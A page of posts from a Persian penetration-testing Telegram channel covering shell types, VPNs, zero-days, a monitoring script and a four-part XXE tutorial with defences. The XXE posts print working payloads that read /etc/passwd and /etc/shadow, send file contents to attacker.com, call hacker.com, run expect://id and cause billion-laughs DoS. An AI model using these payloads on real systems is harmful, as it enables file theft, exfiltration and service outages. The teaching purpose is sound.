Try Hack Box
4.88K subscribers
572 photos
63 videos
79 files
601 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
فصل اول: بخش صفرم: بعضی از اصطلاحات مهم و کاربردی به صورت خلاصه
———————————————————————————————
🔹 Shell

در دنیای هک و مدیریت سیستم، وقتی میگیم "شل" منظورمون یک رابط خط فرمان (Command Line) روی یک سیستم است که به ما اجازه می‌دهد دستورات رو اجرا کنیم.

Local Shell → شلی که روی سیستم خودت داری.
Remote Shell → شلی که روی یک سیستم از راه دور داری.

———————————————————————————————
🔹 Bind Shell

در Bind Shell، سیستم هدف یک پورت رو باز می‌کنه و منتظر می‌مونه تا ما بهش وصل بشیم.

مزیت:
ساده و مستقیم.
عیب: نیاز داره پورت روی هدف باز باشه و فایروال اجازه بده.

📌 مثال ساده:
هدف روی پورت 4444 یک bash یا cmd اجرا می‌کنه، ما به اون پورت وصل میشیم و شل می‌گیریم.

———————————————————————————————
🔹 Reverse Shell

در Reverse Shell، برعکس Bind Shell، سیستم هدف به ما وصل میشه.

* **مزیت:
معمولا راحت‌تر عبور می‌کنه چون فایروال‌ها خروجی رو کمتر محدود می‌کنند.
* عیب: نیاز داریم ما یک listener داشته باشیم که منتظر اتصال باشه.

📌 مثال:
ما روی سیستم خودمون پورت 4444 رو باز می‌کنیم، هدف به اون وصل میشه و یک شل به ما میده.

———————————————————————————————
🔹 Listener Mode

Listener یعنی برنامه‌ای که روی یک پورت گوش میده و منتظر اتصال می‌مونه.

* تو Netcat و Socat، این حالت با گزینه‌هایی مثل -l یا LISTEN: فعال میشه.
* استفاده در Bind Shell، Reverse Shell، دریافت فایل و…

———————————————————————————————
🔹 Client Mode

در Client Mode ما به یک آدرس و پورت وصل میشیم تا داده دریافت یا ارسال کنیم.

* مثال: وقتی با Netcat یا Socat میریم به IP:PORT، ما کلاینت هستیم.

———————————————————————————————
🔹 Port Forwarding

پورت فورواردینگ یعنی هدایت ترافیک یک پورت (یا آدرس) به پورت (یا آدرس) دیگه.

* کاربرد: دسترسی به سرویس‌هایی که مستقیم بهشون دسترسی نداریم.
* مثال: ارسال ترافیک پورت 8080 سیستم ما به پورت 80 یک سرور دیگه.

———————————————————————————————
🔹 Tunneling

تونل‌سازی یعنی انتقال داده از یک پروتکل یا مسیر به یک مسیر امن یا متفاوت.

* میتونه SSH Tunnel باشه، VPN، یا حتی Socat که UDP رو به TCP تبدیل میکنه.
* کاربرد: عبور از محدودیت‌های شبکه، رمزگذاری ترافیک، مخفی‌کردن مسیر ارتباط.

———————————————————————————————
🔹 Port Scanning

اسکن پورت یعنی بررسی لیستی از پورت‌ها برای فهمیدن اینکه باز هستن یا بسته.

* با Netcat، Nmap یا ابزارهای مشابه انجام میشه.
* برای تست امنیت و پیدا کردن سرویس‌ها.

———————————————————————————————
🔹 TCP vs UDP

TCP:
ارتباط مطمئن و دارای چک‌کردن ارسال و دریافت (مانند HTTP, FTP).
UDP:
سریع‌تر ولی بدون تضمین تحویل (مانند DNS, VoIP).

———————————————————————————————
🔹 SSL/TLS

پروتکل‌هایی هستند که ارتباط رو رمزگذاری می‌کنند تا داده‌ها وسط راه قابل خواندن نباشند.

* کاربرد: HTTPS، ایمیل امن، شل امن (Bind یا Reverse).
* در Socat و OpenSSL برای ساخت شل یا تونل امن استفاده میشه.


✍️نویسنده
@TryHackBox| احسان آخوندی

#pwk #CyberSecurity
🔥64👍4
📌 حملات XXE (تزریق XML) - بخش اول

🔹حمله XXE چیست؟
حملۀ XXE (XML External Entity Injection) یک آسیب‌پذیری امنیتی در پردازش داده‌های XML است که به مهاجم اجازه می‌دهد به فایل‌های سیستم سرور دسترسی پیدا کند یا با سیستم‌های backend تعامل داشته باشد. در برخی موارد، این آسیب‌پذیری می‌تواند منجر به حمله‌های جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود.

🔹 انواع حملات XXE
1. استخراج فایل‌ها (مثلاً خواندن /etc/passwd)
2. حملات SSRF (ارسال درخواست به سیستم‌های داخلی)
3. انتقال داده‌ها به صورت خارج از باند (OOB)
4. استخراج داده از طریق پیام‌های خطا

🔹 مثال ساده از XXE:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

در این مثال، مهاجم محتوای فایل /etc/passwd را می‌خواند.

ادامه در بخش بعدی...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #SSRF #CyberSecurity
🔥41
📌 حملات XXE (تزریق XML) - بخش دوم

🔹 حملات پیشرفته XXE

1. حملات Blind XXE (انتقال داده به صورت خارج از باند)
در برخی موارد، برنامه پاسخ مستقیمی نشان نمی‌دهد، اما مهاجم می‌تواند داده‌ها را به یک سرور تحت کنترل خود منتقل کند.

مثال:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "http://attacker.com/?%xxe;">
]>
<foo>&blind;</foo>

در این حالت، محتوای /etc/passwd به سرور مهاجم ارسال می‌شود.

2. دور زدن کنترل‌های دسترسی (PHP Example)
با استفاده از فیلترهای PHP، می‌توان فایل‌های محدودشده را خواند:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/shadow">
]>
<foo>&ac;</foo>

(در این مثال، فایل /etc/shadow به صورت base64 کدگذاری و خوانده می‌شود.)

3. حملات DoS با XXE
بعضی از payloadهای XXE می‌توانند باعث مصرف بیش از حد منابع سرور شوند:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
...
]>
<lolz>&lol9;</lolz>

این حمله باعث ایجاد حجم زیادی از داده‌های تکراری و crash سرور می‌شود.

ادامه در بخش سوم...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #BlindAttack #CyberSecurity
4👍1
https://github.com/TryHackBox/Books/tree/main/Persian%20eLearnSecurity/eJPT

کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی .

تیم TryHackBox بخش هایی از کتابهای دوره eJPT از موسسه eLearnSecurity را ترجمه کرده است. خوشحال میشویم اگر با دادن ستاره ⭐️ در گیت هاب از تلاش ما حمایت کنید تا بتوانیم ترجمه ی کتاب های بیشتری از این موسسه و سایر موسسات معتبر را به صورت رایگان در اختیار شما قرار دهیم. همراهی شما انگیزهی ما برای ارائه محتوای ارزشمندتر است!

#eLearnSecurity
@TryHackBox
🔥93
📌 حملات XXE (تزریق XML) - بخش سوم 

🔹 حملات پیشرفته XXE (ادامه) 

4. استفاده از XXE در فایل‌های SVG (حملات از طریق تصاویر) 
فایل‌های SVG مبتنی بر XML هستند و می‌توانند حاوی payloadهای XXE باشند: 
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" height="200">
    <image xlink:href="expect://id"></image>
</svg>

اگر سایتی آپلود SVG را بدون فیلتر کردن اجازه دهد، این payload می‌تواند دستورات سیستم را اجرا کند. 

5. استفاده از XXE در پروتکل SOAP (سرویس‌های وب) 
در APIهای SOAP-based نیز می‌توان از XXE سوءاستفاده کرد: 
<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://attacker.com/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

این payload درخواستی به سرور مهاجم ارسال می‌کند. 

6. استفاده از کدگذاری UTF-7 برای دور زدن فیلترها 
بعضی سیستم‌ها فقط UTF-8 را پردازش می‌کنند، اما با UTF-7 می‌توان برخی فیلترها را دور زد: 
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hacker.com/+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4


🔹 جمع‌بندی بخش سوم 
- درون SVGها می‌توانند حاوی XXE باشند. 
-حتی APIهای SOAP نیز در معرض خطرند. 
- با تغییر کدگذاری (مثل UTF-7) می‌توان برخی فیلترها را دور زد. 

ادامه در بخش چهارم (پیشگیری و دفاع)...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #SVG #Payload #CyberSecurity
👍52
Live stream started
Executing Macros From a DOCX With Remote Template Injection.pdf
825.4 KB
🔖 مقاله اجرای ماکروها از یک فایل DOCX با تزریق قالب از راه دور (Template Injection)

در این مطلب میخواهم درباره یک روش اجرای کد صحبت کنم و آن را نشان دهم که مدتی پیش به من معرفی شد. این روش اجازه میدهد یک فایل DOCX ساخته شود که هنگام باز شدن، به کاربر امکان اجرا کردن ماکروها از طریق یک فایل قالب DOTM راه دور را میدهد. این حمله در دنیای واقعی مشاهده شده، بخشی از ابزارهای امنیت تهاجمی متن باز است و توسط Cisco Talos هم درباره اش بلاگ نوشته شده، اما در آن بلاگ و ابزار متن باز، این حمله معمولا به عنوان سرقت اطلاعات احراز هویت به ویژه از طریق پروتکل SMB دیده شده است. این مطلب توضیح میدهد چطور میتوان با این روش، قالب ماکرو دار را به صورت آگاه به پروکسی و از طریق HTTP(S) دانلود کرد و داخل فایل DOCX استفاده نمود.

@TryHackBox
8
Live stream finished (2 hours)
#سوال : در هدر IPv4، فیلد TTL چیکار میکنه و چرا در تست نفوذ مهمه ؟
جلسه پنجم زیرو تاک
@TryHackBox | @RadioZeroPod
⭕️ قسمت پنجم زیرو تاک

🔶 مهندس میلاد کهساری  - با محوریت مهندسی معکوس


🔶 شب اول

💢 بخش اول - مسیر شخصی
💢 بخش دوم - مهندسی معکوس، کشف آسیب‌پذیری و توسعه اکسپلویت


منتظر جلسه بعدی باشید.




🎤 راهبر گفتگوی امنیتی : حسین نائیجی

🆔 @RadioZeroPod
🆔 @TryHackBox
🤩8👍42
📌 حملات XXE (تزریق XML) - بخش چهارم (پایانی) 

🔹 روش‌های پیشگیری و دفاع در برابر XXE 

1. غیرفعال کردن پردازش موجودیت‌های خارجی (External Entities) 
در اکثر پردازشگرهای XML (مثل PHP, Java, .NET)، می‌توان این ویژگی را غیرفعال کرد: 

مثال در PHP: 
libxml_disable_entity_loader(true);


مثال در Python (lxml): 
parser = etree.XMLParser(resolve_entities=False)


2. استفاده از Whitelisting برای ورودی‌های XML 
- فقط اجازه‌دهید المان‌ها و attributeهای مورد اعتماد پردازش شوند. 
- از اسکیماهای معتبر (XSD) برای اعتبارسنجی ساختار XML استفاده کنید. 

3. فیلتر کردن محتوای خطرناک 
- بلوک کردن <!DOCTYPE و <!ENTITY در ورودی کاربر. 
- مسدود کردن پروتکل‌های خطرناک مثل file://, php://, expect://

4. به‌روزرسانی کتابخانه‌های پردازش XML 
بسیاری از آسیب‌پذیری‌های XXE در نسخه‌های قدیمی کتابخانه‌ها (مثل libxml2) وجود دارند. 

5. استفاده از فرمت‌های جایگزین (JSON به جای XML) 
در بسیاری از موارد، استفاده از JSON به جای XML می‌تواند خطر XXE را حذف کند. 

🔹 نتیجه‌گیری 
حملات XXE می‌توانند منجر به خواندن فایل‌های حساس، حملات SSRF و حتی اختلال در سرویس (DoS) شوند. با غیرفعال کردن موجودیت‌های خارجی و اعتبارسنجی دقیق ورودی‌ها، می‌توان از این حملات جلوگیری کرد. 

امن‌تر کدنویسی کنید!  

✍️نویسنده
@TryHackBox | The Chaos

#XXE #Prevention #CyberSecurity
5
🔐 راهکارهای امن VPN و کاربردهای آنها

☁️ Cloud VPN
کاربران را به منابع مبتنی بر فضای ابری متصل می‌کند.
🔒 IPsec VPN
ارتباطات IP را از طریق تونل‌های امن رمزگذاری می‌کند.
🌐 SSL VPN
دسترسی امن به شبکه را از طریق مرورگر فراهم می‌کند.
💻 Client-Based VPN
برای دسترسی از راه دور، نیاز به نصب نرم‌افزار دارد.
🏢 Site-to-Site VPN
شبکه‌های مختلف را برای ارتباط ایمن به هم متصل می‌کند.
🏠 Remote Access VPN
کاربران را به شبکه‌های خصوصی متصل می‌کند.

💡 نکته کلیدی:
انتخاب نوع مناسب VPN (برای دورکاری، اتصال شعب یا یکپارچه‌سازی با ابر) می‌تواند استراتژی امنیتی شما را متحول کند!

✍️نویسنده
@TryHackBox | The Chaos

#NetworkSecurity #VPN #Cybersecurity #Networking
4
🔐 راهکارهای VPN و نکات کلیدی امنیتی

☁️ Cloud VPN

کاربرد: اتصال ایمن به سرویس‌های ابری مانند AWS یا Azure

امنیت: استفاده از احراز هویت دو مرحله‌ای و رمزنگاری قوی برای محافظت از داده‌های حساس

🔒 IPsec VPN

کاربرد: ایجاد تونل امن بین دستگاه‌های ثابت (ادارات/شعب)

امنیت: پیاده‌سازی IKEv2 با رمزنگاری AES-256 برای جلوگیری از استراق سمع

🌐 SSL VPN

کاربرد: دسترسی امن از طریق مرورگر بدون نیاز به نصب کلاینت

امنیت: فعالسازی احراز هویت چندعاملی و محدود کردن دسترسی بر اساس نقش کاربران

💻 Client-Based VPN

کاربرد: اتصال ایمن کارمندان دورکار به شبکه سازمان

امنیت: نصب آنتی‌ویرس روی کلاینت‌ها و استفاده از قابلیت Kill Switch

🏢 Site-to-Site VPN

کاربرد: ارتباط امن بین دفاتر مختلف یک سازمان

امنیت: مانیتورینگ مداوم ترافیک و استفاده از فایروال بین شبکه‌ها

🏠 Remote Access VPN

کاربرد: دسترسی کارمندان به منابع داخلی از راه دور

امنیت: محدود کردن دسترسی با Zero Trust و زمان‌بندی Sessionها

🔰 نکات طلایی امنیتی:
همیشه از پروتکل‌های به‌روز (مانند WireGuard) استفاده کنید
دسترسی VPN را فقط به IPهای مورد اعتماد محدود نمایید
لاگ‌های اتصالات را به صورت مداوم بررسی کنید

✍️نویسنده
@TryHackBox | The Chaos

#NetworkSecurity #VPN #Cybersecurity #Networking
5👎1
https://github.com/TryHackBox/Kaveh-WebDiff-Monitor
توضیحات ابزار :

این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویس‌های وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده می‌شود.
با استفاده از این اسکریپت می‌توانید چندین IP/Port/Schema/Vhost را به صورت دوره‌ای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.

ویژگی‌ها

نظارت زمان‌بندی‌شده: اجرای خودکار در بازه‌های زمانی مشخص.

پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL.

Virtual Host Routing:
اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنه‌های روی یک سرور).

بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP.

ذخیره‌سازی وضعیت‌ها در فایل /tmp/http_mon.log برای مقایسه.

قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک.

نحوه اجرا در لینوکس

1. اسکریپت را کلون یا دانلود کنید:
   git clone https://github.com/TryHackBox/Kaveh-WebDiff-Monitor.git
   cd Kaveh-WebDiff-Monitor
   chmod +x Kaveh-Webdiff-Monitor.sh


2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):  
   192.168.1.10 443 https example.com
   10.0.0.5 80 http test.local
  


3. اجرای اسکریپت:
   ./Kaveh-Webdiff-Monitor.sh targets.txt

  
4. خروجی نمونه:
   Fri Aug 15 23:45:05 UTC 2025
   [*] 192.168.1.10 443 example.com: 200 157
   [*] 10.0.0.5 80 test.local: 404 12
   [!] تغییر وضعیت برای example.com
  

کاربرد در تست نفوذ

در فرایند تست نفوذ، این ابزار می‌تواند نقش مهمی داشته باشد:

شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق).

نظارت مداوم Virtual Hostها برای پیدا کردن دامنه‌های در حال توسعه یا فعال شدن سرویس‌های مخفی.

ردیابی پاسخ سرور بعد از تست‌های سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها).

شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF.

کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت.

نکات

مسیر /tmp/http_mon.log در هر بار بوت ریست می‌شود؛ در صورت نیاز می‌توانید آن را به مسیر دائمی تغییر دهید.

برای استفاده در شبکه‌های بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد می‌شود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود.

این ابزار نیاز به curl و محیط Bash دارد.

اگر این ابزار براتون مفید بود استارز یادتون نشه

@TryHackBox
👍43
زیرو دی (Zero-Day) چیست؟ 
آسیب‌پذیری 0Day به یک نقص امنیتی در نرم‌افزار یا سخت‌افزار گفته می‌ شود که برای فروشنده (تولیدکننده) ناشناخته است و هیچ وصله‌ای (پچ) برای رفع آن وجود ندارد. عبارت "0Day" به این معنی است که فروشنده هیچ فرصتی (0Day) برای پاسخگویی و رفع آسیب‌پذیری قبل از  exploited مهاجمان ندارد. به روشی که از این آسیب‌پذیری اکپسلویت می‌کند، اکسپلویت زیرو دی (Zero-Day Exploit) می‌گویند.

۱. آسیب‌پذیری زیرو دی (Zero-Day Vulnerability) 
- یک نقص در نرم‌افزار یا سخت‌افزار است که فروشنده از آن بی‌خبر است. 
- این نقص می‌تواند ناشی از خطای کدنویسی، ضعف طراحی، یا پیکربندی نادرست باشد. 
- از آنجا که فروشنده از وجود این آسیب‌پذیری اطلاعی ندارد، هیچ راه‌حل یا پچی برای آن ارائه نشده است. 

۲. اکسپلویت زیرو دی (Zero-Day Exploit) 
- روشی است که مهاجمان برای سوءاستفاده از آسیب‌پذیری 0Day استفاده می‌کنند. 
- شامل کدهای مخرب یا اقداماتی است که از این نقص برای دسترسی غیرمجاز یا آسیب رساندن به سیستم استفاده می‌کند. 

۳. حمله زیرو دی (Zero-Day Attack) 
- حمله‌ای است که با exploiting از آسیب‌پذیری 0Day انجام می‌شود. 
- این حمله قبل از اینکه فروشنده متوجه آسیب‌پذیری شود یا پچی منتشر کند، رخ می‌دهد. 

۴. چرا حملات 0Day خطرناک هستند؟ 
- هیچ دفاع یا راه‌ حل فوری برای مقابله با آنها وجود ندارد. 
- مهاجمان می‌توانند قبل از کشف آسیب‌پذیری، برای مدت‌ زمانی طولانی از آن سوء استفاده کنند. 
- این حملات می‌توانند منجر به نفوذ به سیستم‌ها، سرقت داده‌ها، یا انتشار بدافزار شوند. 

۵. مثال: 
- در آوریل ۲۰۲۰، یک آسیب‌پذیری 0Day در نرم‌افزار Zoom کشف شد که به مهاجمان اجازه می‌ داد تحت شرایط خاص، دسترسی از راه دور به کامپیوتر کاربران بگیرند. 
- این آسیب‌پذیری پس از کشف، پچ شد، اما نه قبل از آنکه برخی سازمان‌ ها به‌طور موقت استفاده از Zoom را محدود کنند. 

۶. کشف و exploiting از آسیب‌پذیری‌ های 0Day: 
- هکرها ممکن است این آسیب‌پذیری‌ ها را از طریق مهندسی معکوس نرم‌افزار، تحلیل کد، یا مهندسی اجتماعی کشف کنند. 
- سپس اکسپلویت‌ هایی برای سو استفاده از این نقاط ضعف توسعه می‌ دهند. 
- تا زمانی که فروشنده آسیب‌پذیری را کشف و پچی منتشر نکند، این حمله "0Day" محسوب می‌شود. 

این نوع حملات یکی از بزرگترین تهدیدات امنیتی در دنیای سایبری هستند، زیرا قبل از کشف، هیچ راه‌حلی برای مقابله با آنها وجود ندارد.
#ZeroDay
@TryHackBox
🔥62👍1👎1
به شما اطلاع می‌دهم که عضویت ۲۴ ساعته با هزینه ۵ دلار از طرف شودان فعال شده است. اگر به این پیشنهاد علاقه‌مندید، می‌توانید از آن استفاده کنید.
https://account.shodan.io/billing/member
#Shodan
@TryHackBox
👍6👎1
Try Hack Box
#سوال : در هدر IPv4، فیلد TTL چیکار میکنه و چرا در تست نفوذ مهمه ؟
#جواب: TTL (Time To Live) تعداد hopها (پرش‌ها بین روترها) رو که پکت میتونه طی کنه مشخص میکنه هر روتر ۱ کم میکنه، و اگر به ۰ برسه، پکت drop میشه و ICMP TTL Exceeded برمیگرده. در pentest، برای traceroute و نقشه‌ برداری توپولوژی شبکه استفاده میشه (مثل پیدا کردن روترها یا فایروال‌ها).
مثال عملی: traceroute google.com

نشون میده TTL چطور کم میشه.
🔥63👎1
موضوع_دامپ‌های_حافظه_LSASS_از_همیشه_مخفیانه‌تر_هستند_پارت_2.pdf
628.8 KB
🔖 پارت دوم دامپ های حافظه LSASS از همیشه مخفیانه تر هستند.


@TryHackBox | Github | YouTube | Group
🔥4👎1
Bypassing SEHOP (1).pdf
744.7 KB
🔖 مقاله بایپس کردن SEHOP

💢 مشخصات SEHOP
💢 کرش و اکسپلویت


#Bypass #SEHOP
@TryHackBox | Github | YouTube | Group
🔥3👎1
Forwarded from Try Code Box
 
from scapy.all import *

  # اسکن پورت 80 با SYN
  pkt = IP(dst="192.168.1.1") / TCP(dport=80, flags="S")
  resp = sr1(pkt, timeout=1)
  if resp and resp[TCP].flags == "SA":
      print("پورت 80 بازه!")
 


ایرادات این کد را پیدا کنید .
@TryCodeBox
👎2